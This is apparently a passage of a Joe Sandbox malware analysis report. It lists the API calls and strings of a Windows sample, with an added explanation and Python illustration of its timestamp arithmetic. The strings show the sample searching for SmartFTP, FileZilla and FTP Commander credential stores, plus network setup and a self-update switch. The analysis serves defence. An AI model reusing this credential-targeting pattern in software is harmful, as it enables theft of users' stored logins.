                          • String ID: SOFTWARE\smartftp\client 2.0\settings\backup$SOFTWARE\smartftp\client 2.0\settings\general\favorites$folder$personal favorites
                          • API String ID: 3923277744-821743658
                          • Opcode ID: e843f97767911fec9b6fd3034691d6ab50a9750596cd8693bb12be5acb83529b
                          • Instruction ID: 0454e2dbaba930a1c05830d090df37f1eb9a44f33d61805f8e12f109ce5a2445
                          • Opcode Fuzzy Hash: e843f97767911fec9b6fd3034691d6ab50a9750596cd8693bb12be5acb83529b
                          • Instruction Fuzzy Hash: 21213E71D00518ABDB10EB95DC41ADFB7BCEB44318F1084B7E514B2181EB389B49CFA9
                          APIs
                          • CoInitialize.OLE32(00000000), ref: 0040A0C0
                          • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,0040A16F,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A0CE
                          • CreateWindowExW.USER32(00000000,AtlAxWin,Shell.Explorer,80000000,00000000,00000000,000004B0,00000320,00000000,00000000,00000000), ref: 0040A0F3
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CreateHandleInitializeModuleWindow
                          • String ID: AtlAxWin$Shell.Explorer
                          • API String ID: 950422046-1300462704
                          • Opcode ID: e9b6661190c81bdf072f7cb3f1dc159ab5559684b807faa4a04e62d0e94038f2
                          • Instruction ID: 8885d0d040d3ab3e1edd42f45155a7fe84e7bff231f75e8e802cb7627400a982
                          • Opcode Fuzzy Hash: e9b6661190c81bdf072f7cb3f1dc159ab5559684b807faa4a04e62d0e94038f2
                          • Instruction Fuzzy Hash: 78118F30200200FFD320ABA6CC4CE6B7BBCEFCA711B240579F515EB291D7789801CA65
                          APIs
                          • GetSystemTime.KERNEL32(?,?,000003E8,?,?,?,?,?,?,?,?,?,?,?,00407B63,?), ref: 0040727C
                          • SystemTimeToFileTime.KERNEL32(?,?,?,000003E8,?), ref: 004072C1
                          • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 004072CB
                          • __aulldiv.LIBCMT ref: 004072E3
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Time$System$File$__aulldiv
                          • String ID: c{@
                          • API String ID: 3735792614-264719814
                          • Opcode ID: a145c05d1847671377470c3096bfc685d9fda3d476ef25e64420ea8c3ac11d0d
                          • Instruction ID: ef19eb4ac8525f4bf2260e0142840e6d018c3cac6eb9bd4f47b1f5cd165e8a78
                          • Opcode Fuzzy Hash: a145c05d1847671377470c3096bfc685d9fda3d476ef25e64420ea8c3ac11d0d
                          • Instruction Fuzzy Hash: D401DE62D1022DAACB01DFE4D984CEFB77DFF44348B00156AE901F7250E7B5AA4887A5
                          APIs
                          • GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040286E), ref: 004072F9
                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00407337
                          • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 00407341
                          • __aulldiv.LIBCMT ref: 00407359
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Time$System$File$__aulldiv
                          • String ID: n(@
                          • API String ID: 3735792614-2525614082
                          • Opcode ID: fb9972a15ff1dd7e61217f7ff9a5823acba4978d5a12943579487cf22718de7c
                          • Instruction ID: 0875687ad9f8fbdff1f190dbab39d4211c2ed1a8acd2afdabfbd9ccbaffc37b8
                          • Opcode Fuzzy Hash: fb9972a15ff1dd7e61217f7ff9a5823acba4978d5a12943579487cf22718de7c
                          • Instruction Fuzzy Hash: 83011A66D2022DAACF00DBE5DD44CEFB7BCFF44344B04051AE901B3210E7B5A648CBA9
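The two functions above (0040727C and 004072F9) share one idiom: GetSystemTime, SystemTimeToFileTime on that time and on a SYSTEMTIME whose wYear is 0x7B2 (1970), then __aulldiv on the difference. That is the standard way to get seconds since the Unix epoch from Win32 primitives. Their String IDs c{@ and n(@ are not real strings: they are the little-endian bytes of the return addresses 00407B63 and 0040286E that appear in the same call traces. The block below reproduces the arithmetic in pure Python as an added illustration, not the sample's code; no Win32 call is made. The earlier function at 004074AD applies the same steps with wYear 0x7D8 (2008) and GetTimeZoneInformation, which reads like a local-time variant against a 2008 base, but that interpretation is an assumption.

```python
"""Reproduce the timestamp arithmetic of the two functions above: GetSystemTime,
SystemTimeToFileTime on that time and on a SYSTEMTIME whose wYear is 0x7B2
(1970), then __aulldiv on the difference. The result is seconds since the Unix
epoch built only from FILETIME values. Added illustration in pure Python, not
the sample's code; no Win32 call is made."""
import time
from datetime import datetime, timezone

TICKS_PER_SECOND = 10_000_000                    # a FILETIME tick is 100 ns
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def systemtime_to_filetime(year: int, month: int, day: int, hour: int = 0,
                           minute: int = 0, second: int = 0, ms: int = 0) -> int:
    """SystemTimeToFileTime: 64-bit count of 100-ns ticks since 1601-01-01 UTC."""
    dt = datetime(year, month, day, hour, minute, second, ms * 1000, tzinfo=timezone.utc)
    delta = dt - FILETIME_EPOCH
    return (delta.days * 86400 + delta.seconds) * TICKS_PER_SECOND + delta.microseconds * 10


# The constant the sample recomputes on every call: FILETIME of 1970-01-01 00:00 UTC.
UNIX_EPOCH_FILETIME = systemtime_to_filetime(1970, 1, 1)


def filetime_to_unix(ft: int) -> int:
    """(now - ft_1970) / 10_000_000 with unsigned 64-bit division, as __aulldiv does."""
    if ft < UNIX_EPOCH_FILETIME:
        raise ValueError("FILETIME predates the Unix epoch; the unsigned division would wrap")
    return (ft - UNIX_EPOCH_FILETIME) // TICKS_PER_SECOND


def unix_now() -> int:
    """GetSystemTime -> SystemTimeToFileTime -> subtract -> divide, as in the sample."""
    now = datetime.now(timezone.utc)
    ft = systemtime_to_filetime(now.year, now.month, now.day, now.hour,
                                now.minute, now.second, now.microsecond // 1000)
    return filetime_to_unix(ft)


def drift_from_libc() -> int:
    """Sanity check against time.time(); should be 0 or 1 second."""
    return abs(unix_now() - int(time.time()))


if __name__ == "__main__":
    print(hex(UNIX_EPOCH_FILETIME), unix_now(), drift_from_libc())
```

The 1970 FILETIME constant is 0x019DB1DED53E8000 (116444736000000000); spotting a SYSTEMTIME with wYear 1970 next to __aulldiv is a quick way to label such a routine as "get Unix time" during triage.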
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040AB93
                          • CharLowerW.USER32(?), ref: 0040ABA0
                          • GetCommandLineW.KERNEL32 ref: 0040ABC0
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CharCommandFileLineLowerModuleName
                          • String ID: /updatefile3$netprotdrvss.exe
                          • API String ID: 3118597399-3449771660
                          • Opcode ID: a9092c2346d55b23f20d8634028d89874de2ded0d1b8197c9b1551ea588aa001
                          • Instruction ID: 1eba2a713c21f7c79877a49aa3ec6850c44e44909145826ab611dd80b60fa5a6
                          • Opcode Fuzzy Hash: a9092c2346d55b23f20d8634028d89874de2ded0d1b8197c9b1551ea588aa001
                          • Instruction Fuzzy Hash: 41E09B3655021A5AD750FBB1DD07BA633ACFB01705F1049B6A246F10C0EE74D55D4F9D
                          APIs
                          • GetTickCount.KERNEL32 ref: 00409FCE
                          • GetTickCount.KERNEL32 ref: 00409FDE
                          • Sleep.KERNEL32(00000064,?,?,0040A442,?,?), ref: 00409FEC
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409FFB
                          • DispatchMessageW.USER32(?), ref: 0040A009
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CountMessageTick$DispatchPeekSleep
                          • String ID:
                          • API String ID: 4159783438-0
                          • Opcode ID: 45312298ad5970842c5ee584b14830e042aefe59ca6bdbaf3830585a06b866aa
                          • Instruction ID: c0dc46c0c87f7bc49602bd7d2efae9f565a6f52602c3eafe7569a8fa2f6b8eea
                          • Opcode Fuzzy Hash: 45312298ad5970842c5ee584b14830e042aefe59ca6bdbaf3830585a06b866aa
                          • Instruction Fuzzy Hash: 3F118671D103199ECB10AFF5CC8899F7BB9BB45314B144A7AE161F71E0C778CA118B1A
                          APIs
                          • GetTickCount.KERNEL32 ref: 00409F5B
                          • GetTickCount.KERNEL32 ref: 00409F5F
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409F72
                          • DispatchMessageW.USER32(?), ref: 00409F80
                          • Sleep.KERNEL32(0000012C,?,?,?,?,00000000), ref: 00409F8D
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CountMessageTick$DispatchPeekSleep
                          • String ID:
                          • API String ID: 4159783438-0
                          • Opcode ID: 57f1528c1cf960ce56ea9ee11f0e0f6d2bf2bfe74b8bc540e63205e3b9b5f8f9
                          • Instruction ID: 2f378a1af0056e794f94b22e0cd08b0b0b180d2e60cd5d2ebdc62f673b65dbb1
                          • Opcode Fuzzy Hash: 57f1528c1cf960ce56ea9ee11f0e0f6d2bf2bfe74b8bc540e63205e3b9b5f8f9
                          • Instruction Fuzzy Hash: D1F0C872D042149BD714B7F2DD09B7D76A89B45714F104A36F551F70D1CA7CCD148A58
                          APIs
                            • Part of subcall function 0040A469: InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040A535
                            • Part of subcall function 0040A469: InternetSetOptionW.WININET(00000000,00000041,00000000,00000004), ref: 0040A551
                            • Part of subcall function 00409F2B: GetTickCount.KERNEL32 ref: 00409F5B
                            • Part of subcall function 00409F2B: GetTickCount.KERNEL32 ref: 00409F5F
                            • Part of subcall function 00409F2B: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409F72
                            • Part of subcall function 00409F2B: DispatchMessageW.USER32(?), ref: 00409F80
                            • Part of subcall function 00409F2B: Sleep.KERNEL32(0000012C,?,?,?,?,00000000), ref: 00409F8D
                          • CharLowerW.USER32(?,?,?,00423DD4,?,00000001), ref: 00408751
                          • SysFreeString.OLEAUT32(?), ref: 0040875A
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CountInternetMessageTick$CharDispatchFreeLowerOpenOptionPeekSleepString
                          • String ID: http://$+@
                          • API String ID: 147727044-3628382792
                          • Opcode ID: a6511d5d8b0c810daf140c5c911559c37a96c1275369982660b5569d586a1c5f
                          • Instruction ID: 305e6509dfdc939f3ffb47eba37a7af79922f54013ecb7534e3961c93d2e4cc1
                          • Opcode Fuzzy Hash: a6511d5d8b0c810daf140c5c911559c37a96c1275369982660b5569d586a1c5f
                          • Instruction Fuzzy Hash: 4E41D5729002199BCF15AF66CD056EFBBB4FF44314F20447FE981B3292DB3889528B99
                          APIs
                          • SetFilePointer.KERNEL32(00414F68,00000000,00000000,00000000,UniqueNum,00000001), ref: 00407E09
                          • WriteFile.KERNEL32(00000078,00000064,00000001,00000000), ref: 00407E20
                            • Part of subcall function 00407CD7: GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                            • Part of subcall function 00407CD7: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$CreateModuleNamePointerWrite
                          • String ID: UniqueNum$x
                          • API String ID: 594998759-2399716736
                          • Opcode ID: 0d1cac2645660f3edc8ae4858b9aa10093ebf6a3be27c46c4cc389029dd9494e
                          • Instruction ID: 8c5cde1ed6458afa5e70834db293a7f07ca8c6efd1b8e13f0da2095665a79c5a
                          • Opcode Fuzzy Hash: 0d1cac2645660f3edc8ae4858b9aa10093ebf6a3be27c46c4cc389029dd9494e
                          • Instruction Fuzzy Hash: F72129329002186BDF04AB74ED49DDF3B69EF44315F104636FA02E71E1E634D951C799
                          APIs
                          • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 0040413A
                            • Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
                            • Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                            • Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                            • Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
                            • Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                            • Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9
                            • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
                          • String ID: #$&$*filezilla*
                          • API String ID: 3438805939-758400021
                          • Opcode ID: 7f420262a527ace9c0fec2a61cbcbac63df6dda7f3825d1df3812bb47b8bab04
                          • Instruction ID: af0dd5899ef73ee7264a7e51d90439c8fcf38b6470501fb51340e8e2557856c3
                          • Opcode Fuzzy Hash: 7f420262a527ace9c0fec2a61cbcbac63df6dda7f3825d1df3812bb47b8bab04
                          • Instruction Fuzzy Hash: 8E1151B2901128BADB10EA92DC49EDF7BBCEF85304F00407AF605B6080E7385785CBE9
                          APIs
                          • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 00404AE5
                            • Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
                            • Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                            • Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                            • Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
                            • Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                            • Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9
                            • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
                          • String ID: #$&$ftp*commander*
                          • API String ID: 3438805939-1149875651
                          • Opcode ID: 371d79112eeabe7a5308543586f4c365cccc6d4de9a1601f9ce447be0e8ea6cb
                          • Instruction ID: 4761086559ade70d73b1403ca51e5d3bc462c500c99379e4fd01d7d946a964d6
                          • Opcode Fuzzy Hash: 371d79112eeabe7a5308543586f4c365cccc6d4de9a1601f9ce447be0e8ea6cb
                          • Instruction Fuzzy Hash: B61121B2901118BADB10AA92DC49EDF7F7CEF85704F00407AF609B6180E7799785CBA9
                          APIs
                          • SysFreeString.OLEAUT32(?), ref: 004094A9
                          • SysFreeString.OLEAUT32(?), ref: 004094AE
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: FreeString
                          • String ID: _blank$an.yandex.ru/count
                          • API String ID: 3341692771-25359924
                          • Opcode ID: 4ab6eb577aae85ed23f24708000ea2df93b57f18851f250654f87edd31753785
                          • Instruction ID: 1eacecae91598e8b756cf85833a4a3bbf756f1dfdfc5fa02fd6c22f827bf3b29
                          • Opcode Fuzzy Hash: 4ab6eb577aae85ed23f24708000ea2df93b57f18851f250654f87edd31753785
                          • Instruction Fuzzy Hash: 28015A35204114BBDB109FA6CD05D9B77A8EF85324724443BBC15E7291E779EE02CA69
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                          • GetCurrentDirectoryW.KERNEL32(00001000,?,?,00407E44,00000001,UniqueNum), ref: 00407D15
                          • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$CreateCurrentDirectoryModuleName
                          • String ID: \merocz.xc6
                          • API String ID: 3818821825-505599559
                          • Opcode ID: 2f84b54d5be0d3dae659ee3f303fbd3ad06020502789306fc31ef9c8cba0b7e5
                          • Instruction ID: bb9f2ddab4bab237696810683399403c99d26191ea9c434de7a02090ea9b9a12
                          • Opcode Fuzzy Hash: 2f84b54d5be0d3dae659ee3f303fbd3ad06020502789306fc31ef9c8cba0b7e5
                          • Instruction Fuzzy Hash: DA01A231904224ABE7309B569C49FEB77ADEF85710F00447FB505F20D1D6749A80CAAA
                          APIs
                          • SysAllocString.OLEAUT32(?), ref: 00409868
                          • SysAllocString.OLEAUT32(?), ref: 00409876
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AllocString
                          • String ID: "URL"$"encrypted"
                          • API String ID: 2525500382-4151690107
                          • Opcode ID: f6e867073f93e28a707ce71cee5b1d0d556dab41e30d3c647449298916898aec
                          • Instruction ID: 961e294ab5ae80d7ab2f0271a6faa46f3ea3f555f1d55132cdad114d364c87da
                          • Opcode Fuzzy Hash: f6e867073f93e28a707ce71cee5b1d0d556dab41e30d3c647449298916898aec
                          • Instruction Fuzzy Hash: 62F0D671A0021DA7CF00AB69CC01FD637ECAB4438CF1484B6F904F32C1E974EA098B98
                          APIs
                          • SysAllocString.OLEAUT32(?), ref: 004097ED
                          • SysAllocString.OLEAUT32(?), ref: 004097FB
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AllocString
                          • String ID: "domain"$"url"
                          • API String ID: 2525500382-2438671658
                          • Opcode ID: 98133a6a8bfb7a18a2a86276567a63b94d588fd2e230135a268bf1c7eb2bd3b5
                          • Instruction ID: 610bf4d9b2292206f8ef054453b19a236663fc5a2da35db14ea77673b97cd822
                          • Opcode Fuzzy Hash: 98133a6a8bfb7a18a2a86276567a63b94d588fd2e230135a268bf1c7eb2bd3b5
                          • Instruction Fuzzy Hash: 08F0A271A0021DA6CF41AAA9CC05FD637E8AB44348F1444B6F908F7281EA78EA188B94
                          APIs
                          • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Internet Explorer,00000000,00000001,00000000,?,?,00402C77), ref: 00406C91
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Open
                          • String ID: Build$SOFTWARE\Microsoft\Internet Explorer$w,@
                          • API String ID: 71445658-3061378640
                          • Opcode ID: 340e09b6331f5021cec00f630817528513552a638f53ca028bdc246a1c5cc706
                          • Instruction ID: 930cfdd3d9e2cf302383723a85cc45ac24d6ba1b6d45bcf7a76994dd36721e6e
                          • Opcode Fuzzy Hash: 340e09b6331f5021cec00f630817528513552a638f53ca028bdc246a1c5cc706
                          • Instruction Fuzzy Hash: FBE08672664218FAEF009B929C07FDA77ACDB00758F20086AF502F10C1DAB5F714D6AC
                          APIs
                          • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                            • Part of subcall function 0040845D: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000008,00000000,?,?,004084C5,?,?,?,00000008,?,00403796,?), ref: 00408475
                            • Part of subcall function 0040845D: RegCloseKey.ADVAPI32(?,?,004084C5,?,?,?,00000008,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408484
                          • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000008,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408524
                          • GetProcessHeap.KERNEL32(00000000,00000000,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408534
                          • HeapFree.KERNEL32(00000000,?,00403796,?,?,00000104,?,00000000,00000008), ref: 0040853B
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Heap$CloseEnvironmentExpandFreeOpenProcessQueryStringsValue
                          • String ID:
                          • API String ID: 3604167287-0
                          • Opcode ID: debf70bf2fb47a5e7b7c0995a40a49e648bf285b45755a0d6fc166e7e3eeac12
                          • Instruction ID: 704a8cbe2313c99ccb7bf4cac6d27c9c5720caa44ca6f9902b9fd9ccb38d811f
                          • Opcode Fuzzy Hash: debf70bf2fb47a5e7b7c0995a40a49e648bf285b45755a0d6fc166e7e3eeac12
                          • Instruction Fuzzy Hash: 0521C871900626BBDF205B748E45ABF3668EF05328F10063EF561F22D0EB758D508658
                          APIs
                          • CharLowerW.USER32(00408E44,00000000,00000000,?,00408E44,00408795), ref: 004095A4
                          • CharLowerW.USER32(00408795), ref: 004095D8
                          • SysFreeString.OLEAUT32(00408795), ref: 00409608
                          • SysFreeString.OLEAUT32(00408E44), ref: 0040960D
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CharFreeLowerString
                          • String ID:
                          • API String ID: 2335467167-0
                          • Opcode ID: ff78d62f8bf35a608bc63f02c9c9fafbc1ea89148f156ec964e1e543baeabb3a
                          • Instruction ID: 6911929459278785efe31e607170db17e103bee024a9a22ae291265c1613d99e
                          • Opcode Fuzzy Hash: ff78d62f8bf35a608bc63f02c9c9fafbc1ea89148f156ec964e1e543baeabb3a
                          • Instruction Fuzzy Hash: 20116D72D00108BBDB019F9ADC85B9E7BB8EF44305F1544BAE405F21A1D779AE409F44
                          APIs
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004081A3
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                          • String ID: -
                          • API String ID: 885266447-2547889144
                          • Opcode ID: b815d9a6725b7b7d4663accafdf12bc662ce9b6e2c1759233b63132321253c45
                          • Instruction ID: cbf3f064ca1262f0759db58cdf0f181467b31290bd4ebff5f053a9a619aca6df
                          • Opcode Fuzzy Hash: b815d9a6725b7b7d4663accafdf12bc662ce9b6e2c1759233b63132321253c45
                          • Instruction Fuzzy Hash: 58415D31D0422699CB2177B98E417BB61A9DF44758F1440BFF9C0B72C2EEBC5D8581AE

                          Control-flow Graph
                          control_flow_graph 90 4012c0-4012e8 FindFirstFileA call 401080
                          APIs
                          • FindFirstFileA.KERNELBASE(ks clku .d,254B559C), ref: 004012DD
                            • Part of subcall function 00401080: GetTickCount.KERNEL32 ref: 00401096
                            • Part of subcall function 00401080: GetDesktopWindow.USER32 ref: 004010B8
                            • Part of subcall function 00401080: GetClassNameA.USER32(00000000,00000000,00000400), ref: 004010CC
                            • Part of subcall function 00401080: GlobalAlloc.KERNELBASE(00000000,000F6950), ref: 004010EE
                            • Part of subcall function 00401080: GetCurrentProcess.KERNEL32(?), ref: 0040114B
                            • Part of subcall function 00401080: GetProcessIoCounters.KERNEL32(00000000), ref: 0040114E
                            • Part of subcall function 00401080: GetCurrentProcess.KERNEL32(?,?,?,?), ref: 004011B9
                            • Part of subcall function 00401080: GetProcessTimes.KERNELBASE(00000000), ref: 004011BC
                          Memory Dump Source
                          • Source File: 00000010.00000002.1905340709.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000010.00000002.1905295375.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000010.00000002.1905340709.000000000040D000.00000040.00000001.01000000.00000004.sdmp
                          • Associated: 00000010.00000002.1905412672.0000000000422000.00000008.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Process$Current$AllocClassCountCountersDesktopFileFindFirstGlobalNameTickTimesWindow
                          • String ID: ks clku .d
                          • API String ID: 973805369-4096487313
                          • Opcode ID: f572dfb4ccbad4a63051ea1b90dc6402510860d94203dc7c9fb76134c3d65c66
                          • Instruction ID: 8201e92c16030f82e268503128fd01f75d7624b5287a074f0a6a6b49dcde2be8
                          • Opcode Fuzzy Hash: f572dfb4ccbad4a63051ea1b90dc6402510860d94203dc7c9fb76134c3d65c66
                          • Instruction Fuzzy Hash: 13C012701042448FC330AF24DE0ABAA37E4AB48300F00093AA5E8E60A4DA3455598A8A

                          Control-flow Graph

                          APIs
                          • GetTickCount.KERNEL32 ref: 00401096
                          • GetDesktopWindow.USER32 ref: 004010B8
                          • GetClassNameA.USER32(00000000,00000000,00000400), ref: 004010CC
                          • GlobalAlloc.KERNELBASE(00000000,000F6950), ref: 004010EE
                          • GetCurrentProcess.KERNEL32(?), ref: 0040114B
                          • GetProcessIoCounters.KERNEL32(00000000), ref: 0040114E
                          • GetCurrentProcess.KERNEL32(?,?,?,?), ref: 004011B9
                          • GetProcessTimes.KERNELBASE(00000000), ref: 004011BC
                          Strings
                          • cjkU dklu UUido c;aopi quio ,mvnciu cxklnsp, xrefs: 00401131
                          Memory Dump Source
                          • Source File: 00000010.00000002.1905340709.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000010.00000002.1905295375.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000010.00000002.1905340709.000000000040D000.00000040.00000001.01000000.00000004.sdmp
                          • Associated: 00000010.00000002.1905412672.0000000000422000.00000008.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_16_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Process$Current$AllocClassCountCountersDesktopGlobalNameTickTimesWindow
                          • String ID: cjkU dklu UUido c;aopi quio ,mvnciu cxklnsp
                          • API String ID: 509927810-2920797944
                          • Opcode ID: e0b8abb97aa25d1df5e5a951dd4f26f151847d18626d26f9063e3e0a3aa5dc8f
                          • Instruction ID: 30898c1c04428891cb82ceb7e239a2b08516cd6c9376f1465321758e23d54b14
                          • Opcode Fuzzy Hash: e0b8abb97aa25d1df5e5a951dd4f26f151847d18626d26f9063e3e0a3aa5dc8f
                          • Instruction Fuzzy Hash: E55127F1D041744BDB288B298D54BB9BBF5ABC5305F0881BEE689B7381D5385A48CF28

                          Control-flow Graph
